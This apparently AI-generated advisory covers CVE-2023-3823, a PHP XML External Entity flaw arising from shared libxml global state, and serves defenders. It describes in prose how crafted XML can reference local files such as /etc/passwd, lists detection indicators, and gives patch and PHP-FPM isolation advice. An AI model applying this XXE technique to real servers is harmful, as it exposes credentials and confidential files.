CVE-2023-3823 Overview
CVE-2023-3823 is an XML External Entity (XXE) vulnerability affecting PHP versions 8.0.* before 8.0.30, 8.1.* before 8.1.22, and 8.2.* before 8.2.8. The vulnerability arises from PHP's XML functions relying on libxml global state to track configuration variables, including whether external entities are loaded. When other modules such as ImageMagick operate within the same process and modify this global state, external entity loading can be inadvertently enabled, leading to potential disclosure of local files accessible to PHP.
Critical Impact
This vulnerability can lead to unauthorized disclosure of sensitive local files accessible to PHP, potentially exposing configuration files, credentials, and other confidential data. The vulnerable state may persist across multiple requests until the process is shut down.
Affected Products
- PHP 8.0.* before 8.0.30
- PHP 8.1.* before 8.1.22
- PHP 8.2.* before 8.2.8
- Fedora 38
- Debian Linux 10.0
Discovery Timeline
- August 11, 2023 - CVE-2023-3823 published to NVD
- February 13, 2025 - Last updated in NVD database
Technical Details for CVE-2023-3823
Vulnerability Analysis
This XXE vulnerability stems from PHP's architecture around libxml configuration management. PHP's XML parsing functions depend on libxml's process-global state to determine security-critical settings, particularly the configuration for loading external entities. The core issue is that PHP assumes this global state remains unchanged unless explicitly modified by user code calling the appropriate PHP functions.
However, in shared hosting environments or applications using multiple libraries, other modules like ImageMagick also utilize libxml for their internal XML processing needs. When these modules modify the global libxml configuration to enable external entity loading for their purposes, they may leave the state in this insecure configuration. Subsequent PHP XML parsing operations within the same process then inherit this vulnerable state.
The vulnerability enables attackers to craft malicious XML payloads that reference external entities pointing to local files. When processed by an affected PHP application, the parser resolves these external entity references and includes the contents of the targeted files in the parsed output. This can expose sensitive files such as /etc/passwd, application configuration files containing database credentials, or other confidential data accessible to the PHP process.
The persistent nature of this vulnerability is particularly concerning—once triggered, the vulnerable state can persist across many HTTP requests until the PHP process is recycled, expanding the attack window significantly.
Root Cause
The root cause is PHP's reliance on process-global libxml state for tracking security-sensitive XML parser configuration. The CWE-611 (Improper Restriction of XML External Entity Reference) classification reflects the fundamental issue: when external entity loading is unintentionally enabled through cross-module state pollution, XML parsing becomes susceptible to XXE attacks. The design assumption that global state would only be modified through explicit PHP function calls fails to account for shared library usage patterns in complex application stacks.
Attack Vector
The attack vector is network-based and requires no authentication or user interaction. An attacker can exploit this vulnerability by:
- Submitting crafted XML content to a PHP application that processes XML input
- The XML payload contains external entity declarations referencing local files (e.g., file:///etc/passwd)
- If the libxml global state has been modified by another module to enable external entities, the parser resolves these references
- The contents of the referenced files are included in the parsed XML output, potentially returned to the attacker or logged
The vulnerability is exploitable when the XML parsing occurs after another library (such as ImageMagick) has modified the libxml global state within the same process. This condition may occur unpredictably based on request ordering and process reuse patterns.
Detection Methods for CVE-2023-3823
Indicators of Compromise
- Unexpected file read operations by PHP processes, particularly targeting sensitive system files like /etc/passwd or application configuration files
- XML payloads in HTTP requests containing external entity declarations with file://, php://, or other protocol handlers
- Error logs showing attempts to access files outside normal application scope during XML parsing operations
- Unusual outbound connections from PHP processes if external DTD or entity URLs are used in attacks
Detection Strategies
- Monitor web application firewall (WAF) logs for XML requests containing DTD declarations or external entity references
- Implement file integrity monitoring on sensitive configuration files that could be targeted
- Review PHP error logs for libxml-related warnings or external entity resolution errors
- Deploy network monitoring to detect unexpected outbound connections from web server processes
Monitoring Recommendations
- Enable verbose logging for PHP XML parsing functions to capture entity resolution attempts
- Implement centralized log analysis to correlate XML processing events with file access patterns
- Set up alerts for access to sensitive file paths by PHP-FPM or Apache/nginx worker processes
- Monitor process memory and resource usage for signs of excessive file reading operations
How to Mitigate CVE-2023-3823
Immediate Actions Required
- Upgrade PHP to patched versions: 8.0.30 or later, 8.1.22 or later, or 8.2.8 or later
- Review and apply security updates from your operating system vendor (Debian, Fedora, or other distributions)
- Audit applications for XML processing functionality that may be affected
- Consider temporarily disabling XML parsing features if immediate patching is not possible
Patch Information
PHP has released security patches addressing this vulnerability in versions 8.0.30, 8.1.22, and 8.2.8. The fix ensures that PHP properly manages libxml configuration state for each XML parsing operation, preventing cross-module state pollution from enabling external entity loading. For additional details, refer to the PHP Security Advisory on GitHub.
Distribution-specific patches are available:
Workarounds
- Explicitly disable external entity loading by calling libxml_disable_entity_loader(true) before any XML parsing operations in PHP code (note: deprecated in PHP 8.0+)
- Use libxml_set_external_entity_loader() to implement a custom loader that blocks external entity resolution
- Isolate PHP processes from modules like ImageMagick that may modify libxml global state by using separate process pools
- Implement input validation to reject XML documents containing DTD declarations or external entity references
# Configuration example - PHP-FPM pool isolation
# Create separate pool for applications using ImageMagick
# /etc/php-fpm.d/imagemagick-pool.conf
[imagemagick_pool]
user = www-data
group = www-data
listen = /run/php-fpm/imagemagick.sock
pm = dynamic
pm.max_children = 10
pm.start_servers = 2
pm.min_spare_servers = 1
pm.max_spare_servers = 4
# Standard pool for XML processing applications
[xml_pool]
user = www-data
group = www-data
listen = /run/php-fpm/xml.sock
pm = dynamic
pm.max_children = 20
pm.start_servers = 4
pm.min_spare_servers = 2
pm.max_spare_servers = 8
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
